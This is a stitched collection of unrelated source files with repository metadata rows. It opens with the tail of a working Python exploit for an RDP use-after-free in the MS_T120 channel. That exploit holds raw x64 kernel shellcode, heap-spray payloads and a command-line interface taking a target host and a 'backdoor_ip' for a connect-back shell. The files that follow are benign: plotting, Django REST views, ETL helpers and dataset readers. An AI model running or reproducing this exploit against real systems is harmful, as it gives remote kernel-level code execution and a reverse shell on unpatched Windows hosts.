print('Completed Devicve FS Virtual Channel initialization')
self.runExploit()
else :
print(pdu)
def triggerUAF(self):
print('Trigger UAF')
payload = b"\x00\x00\x00\x00\x00\x00\x00\x00\x02"
payload += b'\x00' * 0x22
self.writeDataIntoVirtualChannel('MS_T120', payload)
def dereferenceVTable(self):
print('Dereference VTable')
RN_USER_REQUESTED = 0x3
dpu = MCSDisconnectProviderUltimatumPDU(RN_USER_REQUESTED)
self.server.mcs.sendPDU(dpu)
def runExploit(self):
# see shellcode.s
shellcode = b'\x49\xbd\x00\x0f\x00\x00\x80\xf7\xff\xff\x48\xbf\x00\x08\x00\x00\x80\xf7\xff\xff\x48\x8d\x35\x41\x01\x00\x00\xb9\xc1\x01\x00\x00\xf3\xa4\x65\x48\x8b\x3c\x25\x38\x00\x00\x00\x48\x8b\x7f\x04\x48\xc1\xef\x0c\x48\xc1\xe7\x0c\x48\x81\xef\x00\x10\x00\x00\x66\x81\x3f\x4d\x5a\x75\xf2\x41\xbf\x3e\x4c\xf8\xce\xe8\x52\x02\x00\x00\x8b\x40\x03\x83\xe8\x08\x41\x89\x45\x10\x41\xbf\x78\x7c\xf4\xdb\xe8\x21\x02\x00\x00\x48\x91\x41\xbf\x3f\x5f\x64\x77\xe8\x30\x02\x00\x00\x8b\x58\x03\x48\x8d\x53\x28\x41\x89\x55\x00\x65\x48\x8b\x2c\x25\x88\x01\x00\x00\x48\x8d\x14\x11\x48\x8b\x12\x48\x89\xd0\x48\x29\xe8\x48\x3d\x00\x05\x00\x00\x77\xef\x41\x89\x45\x08\x41\xbf\xe1\x14\x01\x17\xe8\xf8\x01\x00\x00\x8b\x50\x03\x83\xc2\x08\x48\x8d\x34\x19\xe8\xd4\x01\x00\x00\x3d\xd8\x83\xe0\x3e\x74\x09\x48\x8b\x0c\x11\x48\x29\xd1\xeb\xe7\x41\x8b\x6d\x00\x48\x01\xcd\x48\x89\xeb\x48\x8b\x6d\x08\x48\x39\xeb\x74\xf7\x48\x89\xea\x49\x2b\x55\x08\x41\x8b\x45\x10\x48\x01\xd0\x48\x83\x38\x00\x74\xe3\x49\x8d\x4d\x18\x4d\x31\xc0\x4c\x8d\x0d\x4c\x00\x00\x00\x41\x55\x6a\x01\x68\x00\x08\xfe\x7f\x41\x50\x48\x83\xec\x20\x41\xbf\xc4\x5c\x19\x6d\xe8\x6e\x01\x00\x00\x4d\x31\xc9\x48\x31\xd2\x49\x8d\x4d\x18\x41\xbf\x34\x46\xcc\xaf\xe8\x59\x01\x00\x00\x48\x83\xc4\x40\x85\xc0\x74\x9e\x49\x8b\x45\x28\x80\x78\x1a\x01\x74\x09\x48\x89\x00\x48\x89\x40\x08\xeb\x8b\xeb\xfe\x48\xb8\x00\xff\x3f\x00\x80\xf6\xff\xff\x80\x08\x02\x80\x60\x07\x7f\xc3\x65\x48\x8b\x3c\x25\x60\x00\x00\x00\x41\xbf\xe7\xdf\x59\x6e\xe8\x86\x01\x00\x00\x49\x94\x41\xbf\xa8\x6f\xcd\x4e\xe8\x79\x01\x00\x00\x49\x95\x41\xbf\x57\x05\x63\xcf\xe8\x6c\x01\x00\x00\x49\x96\x48\x81\xec\xa0\x02\x00\x00\x31\xf6\x31\xc0\x48\x8d\x7c\x24\x58\xb9\x60\x00\x00\x00\xf3\xaa\x48\x8d\x94\x24\xf0\x00\x00\x00\xb9\x02\x02\x00\x00\x41\xff\xd4\x6a\x02\x5f\x8d\x56\x01\x89\xf9\x4d\x31\xc9\x4d\x31\xc0\x89\x74\x24\x28\x89\x74\x24\x20\x41\xff\xd5\x48\x93\x66\x89\xbc\x24\xd8\x00\x00\x00\xc7\x84\x24\xdc\x00\x00\x00\xc0\xa8\x38\x01\x66\xc7\x84\x24\xda\x00\x00\x00\x11\x5c\x44\x8d\x46\x10\x48\x8d\x94\x24\xd8\x00\x00\x00\x48\x89\xd9\x41\xff\xd6\x48\x8d\x15\x7e\x00\x00\x00\x4d\x31\xc0\x4d\x31\xc9\x31\xc9\x48\x8d\x84\x24\xc0\x00\x00\x00\x48\x89\x44\x24\x48\x48\x8d\x44\x24\x50\x48\x89\x44\x24\x40\x48\x89\x74\x24\x38\x48\x89\x74\x24\x30\x89\x74\x24\x28\xc7\x44\x24\x20\x01\x00\x00\x00\x66\x89\xb4\x24\x90\x00\x00\x00\x48\x89\x9c\x24\xa0\x00\x00\x00\x48\x89\x9c\x24\xa8\x00\x00\x00\x48\x89\x9c\x24\xb0\x00\x00\x00\xc7\x44\x24\x50\x68\x00\x00\x00\xc7\x84\x24\x8c\x00\x00\x00\x01\x01\x00\x00\x65\x48\x8b\x3c\x25\x60\x00\x00\x00\x41\xbf\x9f\xb5\x90\xf3\xe8\x96\x00\x00\x00\xeb\xfe\x63\x6d\x64\x00\xe8\x17\x00\x00\x00\xff\xe0\x57\x48\x31\xff\x48\x31\xc0\xc1\xcf\x0d\xac\x01\xc7\x84\xc0\x75\xf6\x48\x97\x5f\xc3\x57\x56\x53\x51\x52\x55\x8b\x4f\x3c\x8b\xac\x0f\x88\x00\x00\x00\x48\x01\xfd\x8b\x4d\x18\x8b\x5d\x20\x48\x01\xfb\x67\xe3\x2b\x48\xff\xc9\x8b\x34\x8b\x48\x01\xfe\xe8\xbe\xff\xff\xff\x44\x39\xf8\x75\xea\x8b\x5d\x24\x48\x01\xfb\x66\x8b\x0c\x4b\x8b\x5d\x1c\x48\x01\xfb\x8b\x04\x8b\x48\x01\xf8\xeb\x03\x48\x31\xc0\x5d\x5a\x59\x5b\x5e\x5f\xc3\x57\x41\x56\x48\x8b\x7f\x18\x4c\x8b\x77\x20\x4d\x8b\x36\x49\x8b\x7e\x20\xe8\x95\xff\xff\xff\x48\x85\xc0\x74\xef\x41\x5e\x5f\xc3\xe8\xdb\xff\xff\xff\xff\xe0'
# FIXME: hard-coded ip address and port number
assert self.ip.count('.') == 3
dots = [int(v) for v in self.ip.split('.')]
val = 0
for i in range(4):
assert 0 <= dots[i] <= 255
val += dots[i] << (8*i)
tmp = shellcode[:0x1dd]
tmp += pack('<I', val)
tmp += shellcode[0x1e1:0x1e9]
tmp += pack('>H', self.bport)
tmp += shellcode[0x1eb:]
shellcode = tmp
for j in range(0x10000):
if j%0x400 == 0:
print(hex(j))
payload = b'' # PAYLOAD_HEAD_ADDR
payload += pack('<Q', PAYLOAD_HEAD_ADDR+8) # vtable
payload += shellcode
payload = payload.ljust(1580, b'X')
assert len(payload) == 1580
self.writeDataIntoVirtualChannel('RDPSND', payload)
self.triggerUAF()
for j in range(0x600):
if j%0x40 == 0:
print(hex(j))
payload = b''
# resource + 0x20
payload += pack('<Q', 0) # Shared
payload += pack('<Q', 0) # Exc
payload += pack('<Q', 0xdeadbeeffeedface)
payload += pack('<Q', 0xdeadbeeffeedface)
payload += pack('<I', 0x0)
payload += pack('<I', 0x0)
payload += pack('<I', 0x0) # NumShared
payload += pack('<I', 0x0)
payload += pack('<Q', 0x0)
payload += pack('<Q', 0xcafebabefeedfeed)
payload += pack('<Q', 0x0) # SpinL
# resource2
payload += pack('<Q', 0xcafebabefeedfeed)
payload += pack('<Q', 0xfeedfeed14451445)
payload += pack('<Q', 0)
payload += pack('<H', 0) # Active
payload += pack('<H', 0)
payload += pack('<I', 0)
payload += pack('<Q', 0) # Shared
payload += pack('<Q', 0) # Exc
payload += pack('<Q', 0xdeadbeeffeedface)
payload += pack('<Q', 0xdeadbeeffeedface)
payload += pack('<I', 0x0)
payload += pack('<I', 0x0)
payload += pack('<I', 0x0) # NumShared
payload += pack('<I', 0x0)
payload += pack('<Q', 0x0)
payload += pack('<Q', 0xcafebabefeedfeed)
payload += pack('<Q', 0x0) # SpinL
# remainder
payload += pack('<I', 0)
payload += pack('<I', 0)
payload += pack('<Q', 0x72)
payload += b'W' * 8
payload += pack('<Q', PAYLOAD_HEAD_ADDR) # vtable
payload += pack('<I', 0x5)
assert len(payload) == 0x10C - 0x38
payload += b'MS_T120\x00'
payload += pack('<I', 0x1f)
payload = payload.ljust(296, b'Z')
assert len(payload) == 296
self.writeDataIntoVirtualChannel('RDPSND', payload)
print('payload size: {}'.format(len(shellcode)))
self.dereferenceVTable()
def startTLS(self):
contextForServer = ClientTLSContext()
self.server.tcp.startTLS(contextForServer)
def buildProtocol(self, addr):
return self.server.tcp
def run(self):
endpoint = HostnameEndpoint(reactor, self.host, self.port)
endpoint.connect(self)
self.reactor.run()
def main():
parser = argparse.ArgumentParser()
parser.add_argument("rdp_host", help="the target RDP server's ip address")
parser.add_argument("-rp", "--rdpport", type=int, default=3389, help="the target RDP server's port number", required=False)
parser.add_argument("backdoor_ip", help="the ip address for connect-back shellcode")
parser.add_argument("-bp", "--backport", type=int, default=4444, help="the port number for connect-back shellcode", required=False)
args = parser.parse_args()
exploit = Exploit(reactor, args.rdp_host, args.rdpport, args.backdoor_ip, args.backport)
#exploit.appendChannel('drdynvc', ChannelOption.CHANNEL_OPTION_INITIALIZED)
#exploit.appendChannel(MCSChannelName.CLIPBOARD, ChannelOption.CHANNEL_OPTION_INITIALIZED)
exploit.appendChannel(MCSChannelName.DEVICE_REDIRECTION, ChannelOption.CHANNEL_OPTION_INITIALIZED)
exploit.appendChannel('RDPSND', ChannelOption.CHANNEL_OPTION_INITIALIZED)
exploit.appendChannel('MS_T120', ChannelOption.CHANNEL_OPTION_INITIALIZED)
exploit.run()
print('done')
if __name__ == '__main__':
main()
| 44.699454 | 3,207 | 0.724165 | 21,299 | 0.86793 | 0 | 0 | 0 | 0 | 0 | 0 | 6,024 | 0.245477 |
7b5cf1180972e7b3ffbdfafed33eb97b3d3772b4 | 8,241 | py | Python | deep_light/random_selection_threeInputs.py | maqorbani/neural-daylighting | 753c86dfea32483a7afbf213a7b7684e070d3672 | [
"Apache-2.0"
]
| 4 | 2020-08-24T03:12:22.000Z | 2020-08-27T17:13:56.000Z | deep_light/random_selection_threeInputs.py | maqorbani/neural-daylighting | 753c86dfea32483a7afbf213a7b7684e070d3672 | [
"Apache-2.0"
]
| 4 | 2020-08-24T07:30:51.000Z | 2021-02-20T10:18:47.000Z | deep_light/random_selection_threeInputs.py | maqorbani/neural-daylighting | 753c86dfea32483a7afbf213a7b7684e070d3672 | [
"Apache-2.0"
]
| 3 | 2020-04-08T17:37:40.000Z | 2020-08-24T07:32:52.000Z |
#
#
# Copyright (c) 2020. Yue Liu
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# If you find this code useful please cite:
# Predicting Annual Equirectangular Panoramic Luminance Maps Using Deep Neural Networks,
# Yue Liu, Alex Colburn and and Mehlika Inanici. 16th IBPSA International Conference and Exhibition, Building Simulation 2019.
#
#
#
import os
import numpy as np
from matplotlib import pyplot as plt
from deep_light import time_to_sun_angles
import shutil
from deep_light.genData import get_data_path
#### Randomly select the test data from the dataset
#### TODO: make a function with source and destination subdirectories
def select_test_samples(data_root='./ALL_DATA_FP32',
LATITUDE=47,
LONGITUDE=122,
SM=120,
NUM_SAMPLES = 500):
import os
    # read Seattle weather txt data
    # return rows formatted as [dir, dif, al, az, month, date, time]
    def readTxt():
        # read each line, convert the time to sun angles, and collect the rows
f = open("testseattle.txt", "r")
lines = f.readlines()
        data = np.zeros([4709, 7])
        i = 0
for line in lines:
month = int(line.splitlines()[0].split(",")[0])
date = int(line.splitlines()[0].split(",")[1])
time = float(line.splitlines()[0].split(",")[2])
dir = int(line.splitlines()[0].split(",")[3])
dif = int(line.splitlines()[0].split(",")[4])
al, az = time_to_sun_angles.timeToAltitudeAzimuth(date, month, time, LATITUDE, LONGITUDE, SM)
if(dir > 10) or (dif > 10):
data[i]=np.array([dir, dif, al, az, month, date, time])
i = i + 1
print(data.shape)
return data
# These parameters are location related. Right now we use Seattle's parameters.
AB4_DIR = data_root + get_data_path('AB4')
AB0_DIR = data_root + get_data_path('AB0')
SKY_DIR = data_root + get_data_path('SKY')
data = readTxt()
idx = np.arange(data.shape[0])
np.random.shuffle(idx)
n_im = data.shape[0]
train, test = data[idx[:NUM_SAMPLES]], data[idx[NUM_SAMPLES:]]
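    # NOTE: despite the name, `train` holds the NUM_SAMPLES entries that are
    # copied into the test_* folders below; `test` holds the remainder.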
cwd = os.getcwd()
test_all = './data/original_test_all'
if not os.path.exists('./data'):
os.makedirs("./data")
if not os.path.exists(test_all):
os.mkdir(test_all)
os.chdir(test_all)
if (os.path.exists("./result_combo_random")):
shutil.rmtree("./result_combo_random")
os.makedirs("./result_combo_random")
fig = plt.figure(figsize=(10, 10), dpi=150)
plt.scatter(train[:, 0], train[:, 1], s=10, color='r', label="train")
plt.scatter(test[:, 0], test[:, 1], s=1, color='g', label="test")
plt.title("Sky Direct and Diffuse Irradiances Distribution", size=16)
plt.xlabel('Direct')
plt.ylabel('Diffuse')
plt.legend(fancybox=True)
plt.savefig('./result_combo_random/sky.png')
plt.close()
fig = plt.figure(figsize=(10, 10), dpi=150)
plt.scatter(train[:, 2],train[:, 3], s=10, color='r', label="train")
plt.scatter(test[:, 2], test[:, 3], s=1, color='g', label="test")
plt.title("Sun Altitude and Azimuth Distribution", size=16)
plt.xlabel('Altitude')
plt.ylabel('Azimuth')
plt.legend(fancybox=True)
plt.savefig('./result_combo_random/sun.png')
plt.close()
if (os.path.exists("./test_ab0")):
shutil.rmtree("./test_ab0")
if (os.path.exists("./test_ab4")):
shutil.rmtree("./test_ab4")
if (os.path.exists("./test_sky_ab4")):
shutil.rmtree("./test_sky_ab4")
os.makedirs("./test_ab0")
os.makedirs("./test_ab4")
os.makedirs("./test_sky_ab4")
os.chdir(cwd)
    # copy the selected samples into the test_ab0 / test_ab4 / test_sky_ab4 folders
from shutil import copyfile
import os.path
i = 0
bad_samples = 0
for i in range(NUM_SAMPLES):
file_name = "pano_" + str(int(train[i][4])) + "_" + str(int(train[i][5])) + "_" + str(train[i][6]) + "_" + str(int(train[i][0])) \
+ "_" + str(int(train[i][1]))
src_ab4 = AB4_DIR + file_name + ".npy"
src_ab0 = AB0_DIR + file_name + "_ab0.npy"
src_sky = SKY_DIR + file_name + ".npy"
dst_ab0 = test_all + "/test_ab0/"+ file_name + "_ab0.npy"
dst_ab4 = test_all + "/test_ab4/" + file_name + ".npy"
dst_sky = test_all + "/test_sky_ab4/" + file_name + ".npy"
if (os.path.isfile(src_ab4)) and (os.path.isfile(src_ab0)) and (os.path.isfile(src_sky)):
copyfile(src_ab4, dst_ab4)
copyfile(src_ab0, dst_ab0)
copyfile(src_sky, dst_sky)
else:
bad_samples = bad_samples + 1
print('unable to locate:')
if not os.path.isfile(src_ab4) : print(src_ab4)
if not os.path.isfile(src_ab0) : print(src_ab0)
if not os.path.isfile(src_sky) : print(src_sky)
i = i + 1
print('Maps not found = ', bad_samples)
def sample_consistency(data_root='./ALL_DATA_FP32',
LATITUDE=47,
LONGITUDE=122,
SM=120):
import os
    # read Seattle weather txt data
    # return rows formatted as [dir, dif, al, az, month, date, time]
    def readTxt():
        # read each line, convert the time to sun angles, and collect the rows
f = open("testseattle.txt", "r")
lines = f.readlines()
        data = np.zeros([4709, 7])
        i = 0
for line in lines:
month = int(line.splitlines()[0].split(",")[0])
date = int(line.splitlines()[0].split(",")[1])
time = float(line.splitlines()[0].split(",")[2])
dir = int(line.splitlines()[0].split(",")[3])
dif = int(line.splitlines()[0].split(",")[4])
al, az = time_to_sun_angles.timeToAltitudeAzimuth(date, month, time, LATITUDE, LONGITUDE, SM)
if(dir > 10) or (dif > 10):
data[i]=np.array([dir, dif, al, az, month, date, time])
i = i + 1
print(data.shape)
return data
# These parameters are location related. Right now we use Seattle's parameters.
AB4_DIR = data_root + get_data_path('AB4')
AB0_DIR = data_root + get_data_path('AB0')
SKY_DIR = data_root + get_data_path('SKY')
data = readTxt()
idx = np.arange(data.shape[0])
n_im = data.shape[0]
train, test = data[idx], data[idx]
test_all = './data/original_test_all'
import os.path
i = 0
bad_samples = 0
good_samples = 0
for i in range(data.shape[0]):
file_name = "pano_" + str(int(train[i][4])) + "_" + str(int(train[i][5])) + "_" + str(train[i][6]) + "_" + str(int(train[i][0])) \
+ "_" + str(int(train[i][1]))
src_ab4 = AB4_DIR + file_name + ".npy"
src_ab0 = AB0_DIR + file_name + "_ab0.npy"
src_sky = SKY_DIR + file_name + ".npy"
dst_ab0 = test_all + "/test_ab0/"+ file_name + "_ab0.npy"
dst_ab4 = test_all + "/test_ab4/" + file_name + ".npy"
dst_sky = test_all + "/test_sky_ab4/" + file_name + ".npy"
if (os.path.isfile(src_ab4)) and (os.path.isfile(src_ab0)) and (os.path.isfile(src_sky)):
good_samples = good_samples + 1
else:
bad_samples = bad_samples + 1
print('unable to locate:')
if not os.path.isfile(src_ab4) : print(src_ab4)
if not os.path.isfile(src_ab0) : print(src_ab0)
if not os.path.isfile(src_sky) : print(src_sky)
i = i + 1
print('Maps not found = ', bad_samples)
    # TODO: finish the remaining part of this consistency check
| 31.818533 | 138 | 0.580876 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,340 | 0.283946 |
7b5e2470f1d47ae2237ac46314f2765d06fcd634 | 1,993 | py | Python | graphs/ops.py | andreipoe/sve-analysis-tools | 696d9a82af379564b05ce0207a6f872211a819eb | [
"MIT"
]
| 2 | 2020-12-23T02:22:20.000Z | 2020-12-31T17:30:56.000Z | graphs/ops.py | andreipoe/sve-analysis-tools | 696d9a82af379564b05ce0207a6f872211a819eb | [
"MIT"
]
| null | null | null | graphs/ops.py | andreipoe/sve-analysis-tools | 696d9a82af379564b05ce0207a6f872211a819eb | [
"MIT"
]
| 3 | 2020-06-03T17:05:45.000Z | 2021-12-26T13:45:49.000Z | #!/usr/bin/env python3
import argparse
import sys
from concurrent.futures import ThreadPoolExecutor
import pandas as pd
import altair as alt
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument('-a', '--application', help='Plot only the given application')
parser.add_argument('data', help='The data to plot, in CSV or DataFrame pickle format')
return parser.parse_args()
# Plots application `appname`
def plot(results, appname):
appdata = results[results.application == appname]
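    # NOTE: `appdata` is obtained from `results` by boolean indexing; the
    # in-place `count` scaling below can trigger pandas' SettingWithCopyWarning.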
if len(appdata) == 0:
print(f'No data to plot for {appname}.')
return
if appdata[appdata.svewidth == 0].groupby('version').sum()['count'].max() >= 1e9:
scale = 'billion'
appdata.loc[:, 'count'] /= 1e9
else:
scale = 'million'
appdata.loc[:, 'count'] /= 1e6
fname = f'opcount-{appname}-all-clustered-stacked-group.png'
alt.Chart(appdata).mark_bar().encode(x=alt.X('version', title='', axis=alt.Axis(labelAngle=-30)),
y=alt.Y('sum(count)', title=f'Dynamic execution count ({scale} instructions)'),
column='svewidth',
color=alt.Color('optype', title='Op Group', scale=alt.Scale(scheme='set2')))\
.configure(background='white')\
.configure_title(anchor='middle', fontSize=14)\
.properties(title=appname)\
.save(fname, scale_factor='2.0')
print(f'Saved plot for {appname} in {fname}.')
def main():
args = parse_args()
if args.data.endswith('csv'):
df = pd.read_csv(args.data)
else:
df = pd.read_pickle(args.data)
df['svewidth'] = pd.to_numeric(df.svewidth)
applications = [args.application] if args.application else pd.unique(df['application'])
with ThreadPoolExecutor() as executor:
for a in applications:
executor.submit(plot, df, a)
if __name__ == '__main__':
main()
| 30.661538 | 114 | 0.610637 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 498 | 0.249875 |
7b600881aefecd926df3678ce829274a46e661ba | 18 | py | Python | schicexplorer/_version.py | joachimwolff/scHiCExplorer | 8aebb444f3968d398c260690c89c9cd0e3186f0e | [
"MIT"
]
| 10 | 2019-12-09T04:11:18.000Z | 2021-03-24T15:29:06.000Z | common/walt/common/version.py | drakkar-lig/walt-python-packages | b778992e241d54b684f54715d83c4aff98a01db7 | [
"BSD-3-Clause"
]
| 73 | 2016-04-29T13:17:26.000Z | 2022-03-01T15:06:48.000Z | common/walt/common/version.py | drakkar-lig/walt-python-packages | b778992e241d54b684f54715d83c4aff98a01db7 | [
"BSD-3-Clause"
]
| 3 | 2019-03-18T14:27:56.000Z | 2021-06-03T12:07:02.000Z | __version__ = '7'
| 9 | 17 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 | 0.166667 |
7b60c81cc28198aaec6b287552d4028bec373d4b | 2,918 | py | Python | bluebottle/organizations/views.py | terrameijar/bluebottle | b4f5ba9c4f03e678fdd36091b29240307ea69ffd | [
"BSD-3-Clause"
]
| 10 | 2015-05-28T18:26:40.000Z | 2021-09-06T10:07:03.000Z | bluebottle/organizations/views.py | terrameijar/bluebottle | b4f5ba9c4f03e678fdd36091b29240307ea69ffd | [
"BSD-3-Clause"
]
| 762 | 2015-01-15T10:00:59.000Z | 2022-03-31T15:35:14.000Z | bluebottle/organizations/views.py | terrameijar/bluebottle | b4f5ba9c4f03e678fdd36091b29240307ea69ffd | [
"BSD-3-Clause"
]
| 9 | 2015-02-20T13:19:30.000Z | 2022-03-08T14:09:17.000Z | from rest_framework import generics
from rest_framework import filters
from bluebottle.utils.permissions import IsAuthenticated, IsOwnerOrReadOnly, IsOwner
from rest_framework_json_api.pagination import JsonApiPageNumberPagination
from rest_framework_json_api.parsers import JSONParser
from rest_framework_json_api.views import AutoPrefetchMixin
from rest_framework_jwt.authentication import JSONWebTokenAuthentication
from bluebottle.bluebottle_drf2.renderers import BluebottleJSONAPIRenderer
from bluebottle.organizations.serializers import (
OrganizationSerializer, OrganizationContactSerializer
)
from bluebottle.organizations.models import (
Organization, OrganizationContact
)
class OrganizationPagination(JsonApiPageNumberPagination):
page_size = 8
class OrganizationContactList(AutoPrefetchMixin, generics.CreateAPIView):
queryset = OrganizationContact.objects.all()
serializer_class = OrganizationContactSerializer
permission_classes = (IsAuthenticated, )
filter_backends = (filters.SearchFilter,)
search_fields = ['name']
renderer_classes = (BluebottleJSONAPIRenderer, )
parser_classes = (JSONParser, )
authentication_classes = (
JSONWebTokenAuthentication,
)
def perform_create(self, serializer):
serializer.save(owner=self.request.user)
class OrganizationContactDetail(AutoPrefetchMixin, generics.RetrieveUpdateAPIView):
queryset = OrganizationContact.objects.all()
serializer_class = OrganizationContactSerializer
renderer_classes = (BluebottleJSONAPIRenderer, )
parser_classes = (JSONParser, )
permission_classes = (IsAuthenticated, IsOwner)
authentication_classes = (
JSONWebTokenAuthentication,
)
class OrganizationSearchFilter(filters.SearchFilter):
search_param = "filter[search]"
class OrganizationList(AutoPrefetchMixin, generics.ListCreateAPIView):
model = Organization
queryset = Organization.objects.all()
serializer_class = OrganizationSerializer
pagination_class = OrganizationPagination
filter_backends = (OrganizationSearchFilter, )
search_fields = ['name']
permission_classes = (IsAuthenticated,)
renderer_classes = (BluebottleJSONAPIRenderer, )
parser_classes = (JSONParser, )
authentication_classes = (
JSONWebTokenAuthentication,
)
def perform_create(self, serializer):
serializer.save(owner=self.request.user)
prefetch_for_includes = {
'owner': ['owner'],
}
class OrganizationDetail(AutoPrefetchMixin, generics.RetrieveUpdateAPIView):
model = Organization
queryset = Organization.objects.all()
serializer_class = OrganizationSerializer
permission_classes = (IsAuthenticated, IsOwnerOrReadOnly)
renderer_classes = (BluebottleJSONAPIRenderer, )
parser_classes = (JSONParser, )
authentication_classes = (
JSONWebTokenAuthentication,
)
| 30.715789 | 84 | 0.778958 | 2,203 | 0.754969 | 0 | 0 | 0 | 0 | 0 | 0 | 42 | 0.014393 |
7b6172efe890112ba2bd4d2808ee33bca9779adb | 1,646 | py | Python | gen3_etl/utils/defaults.py | ohsu-comp-bio/gen3-etl | 9114f75cc8c8085111152ce0ef686a8a12f67f8e | [
"MIT"
]
| 1 | 2020-01-22T17:05:58.000Z | 2020-01-22T17:05:58.000Z | gen3_etl/utils/defaults.py | ohsu-comp-bio/gen3-etl | 9114f75cc8c8085111152ce0ef686a8a12f67f8e | [
"MIT"
]
| 2 | 2019-02-08T23:24:58.000Z | 2021-05-13T22:42:28.000Z | gen3_etl/utils/defaults.py | ohsu-comp-bio/gen3_etl | 9114f75cc8c8085111152ce0ef686a8a12f67f8e | [
"MIT"
]
| null | null | null | from gen3_etl.utils.cli import default_argument_parser
from gen3_etl.utils.ioutils import JSONEmitter
import os
import re
DEFAULT_OUTPUT_DIR = 'output/default'
DEFAULT_EXPERIMENT_CODE = 'default'
DEFAULT_PROJECT_ID = 'default-default'
def emitter(type=None, output_dir=DEFAULT_OUTPUT_DIR, **kwargs):
"""Creates a default emitter for type."""
return JSONEmitter(os.path.join(output_dir, '{}.json'.format(type)), compresslevel=0, **kwargs)
def default_parser(output_dir, experiment_code, project_id):
parser = default_argument_parser(
output_dir=output_dir,
description='Reads bcc json and writes gen3 json ({}).'.format(output_dir)
)
parser.add_argument('--experiment_code', type=str,
default=experiment_code,
help='Name of gen3 experiment ({}).'.format(experiment_code))
parser.add_argument('--project_id', type=str,
default=project_id,
help='Name of gen3 program-project ({}).'.format(project_id))
parser.add_argument('--schema', type=bool,
default=True,
help='generate schemas (true).'.format(experiment_code))
return parser
def path_to_type(path):
"""Get the type (snakecase) of a vertex file"""
return snake_case(os.path.basename(path).split('.')[0])
def snake_case(name):
"""Converts name to snake_case."""
s1 = re.sub('(.)([A-Z][a-z]+)', r'\1_\2', name)
return re.sub('([a-z0-9])([A-Z])', r'\1_\2', s1).lower()
def camel_case(snake_str):
others = snake_str.split('_')
return ''.join([*map(str.title, others)])
| 35.782609 | 99 | 0.643378 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 413 | 0.250911 |
7b6408ae7e94f31c2cccd6d4bff3b3ad42baca0f | 6,266 | py | Python | csrank/dataset_reader/discretechoice/tag_genome_discrete_choice_dataset_reader.py | kiudee/cs-ranking | 47cf648fa286c37b9214bbad1926004d4d7d9796 | [
"Apache-2.0"
]
| 65 | 2018-02-12T13:18:13.000Z | 2021-12-18T12:01:51.000Z | csrank/dataset_reader/discretechoice/tag_genome_discrete_choice_dataset_reader.py | kiudee/cs-ranking | 47cf648fa286c37b9214bbad1926004d4d7d9796 | [
"Apache-2.0"
]
| 189 | 2018-02-13T10:11:55.000Z | 2022-03-12T16:36:23.000Z | csrank/dataset_reader/discretechoice/tag_genome_discrete_choice_dataset_reader.py | kiudee/cs-ranking | 47cf648fa286c37b9214bbad1926004d4d7d9796 | [
"Apache-2.0"
]
| 19 | 2018-03-08T15:39:31.000Z | 2020-11-18T12:46:36.000Z | import logging
import numpy as np
from sklearn.utils import check_random_state
from csrank.constants import DISCRETE_CHOICE
from csrank.dataset_reader.tag_genome_reader import critique_dist
from csrank.dataset_reader.util import get_key_for_indices
from ..tag_genome_reader import TagGenomeDatasetReader
from ...util import convert_to_label_encoding
logger = logging.getLogger(__name__)
class TagGenomeDiscreteChoiceDatasetReader(TagGenomeDatasetReader):
def __init__(self, dataset_type="similarity", **kwargs):
super(TagGenomeDiscreteChoiceDatasetReader, self).__init__(
learning_problem=DISCRETE_CHOICE, **kwargs
)
dataset_func_dict = {
"nearest_neighbour": self.make_nearest_neighbour_dataset,
"critique_fit_less": self.make_critique_fit_dataset(direction=-1),
"critique_fit_more": self.make_critique_fit_dataset(direction=1),
"dissimilar_nearest_neighbour": self.make_dissimilar_nearest_neighbour_dataset,
"dissimilar_critique_more": self.make_dissimilar_critique_dataset(
direction=1
),
"dissimilar_critique_less": self.make_dissimilar_critique_dataset(
direction=-1
),
}
if dataset_type not in dataset_func_dict:
raise ValueError(
f"dataset_type must be one of {set(dataset_func_dict.keys())}"
)
logger.info("Dataset type: {}".format(dataset_type))
self.dataset_function = dataset_func_dict[dataset_type]
def make_nearest_neighbour_dataset(self, n_instances, n_objects, seed, **kwargs):
X, scores = super(
TagGenomeDiscreteChoiceDatasetReader, self
).make_nearest_neighbour_dataset(
n_instances=n_instances, n_objects=n_objects, seed=seed
)
# Higher the similarity lower the rank of the object, getting the object with second highest similarity
Y = np.argsort(scores, axis=1)[:, -2]
Y = convert_to_label_encoding(Y, n_objects)
return X, Y
def make_critique_fit_dataset(self, direction):
def dataset_generator(n_instances, n_objects, seed, **kwargs):
X, scores = super(
TagGenomeDiscreteChoiceDatasetReader, self
).make_critique_fit_dataset(
n_instances=n_instances,
n_objects=n_objects,
seed=seed,
direction=direction,
)
Y = scores.argmax(axis=1)
Y = convert_to_label_encoding(Y, n_objects)
return X, Y
return dataset_generator
def make_dissimilar_nearest_neighbour_dataset(
self, n_instances, n_objects, seed, **kwargs
):
logger.info(
"For instances {} objects {}, seed {}".format(n_instances, n_objects, seed)
)
X, scores = super(
TagGenomeDiscreteChoiceDatasetReader, self
).make_nearest_neighbour_dataset(
n_instances=n_instances, n_objects=n_objects, seed=seed
)
# Higher the similarity lower the rank of the object, getting the object with second highest similarity
Y = np.argsort(scores, axis=1)[:, 0]
Y = convert_to_label_encoding(Y, n_objects)
return X, Y
def make_dissimilar_critique_dataset(self, direction):
def dataset_generator(n_instances, n_objects, seed, **kwargs):
logger.info(
"For instances {} objects {}, seed {}, direction {}".format(
n_instances, n_objects, seed, direction
)
)
random_state = check_random_state(seed)
X = []
scores = []
length = int(n_instances / self.n_movies) + 1
popular_tags = self.get_genre_tag_id()
for i, feature in enumerate(self.movie_features):
if direction == 1:
quartile_tags = np.where(
np.logical_and(feature >= 1 / 3, feature < 2 / 3)
)[0]
else:
quartile_tags = np.where(feature > 1 / 2)[0]
if len(quartile_tags) < length:
quartile_tags = popular_tags
tag_ids = random_state.choice(quartile_tags, size=length)
distances = [
self.similarity_matrix[get_key_for_indices(i, j)]
for j in range(self.n_movies)
]
critique_d = critique_dist(
feature,
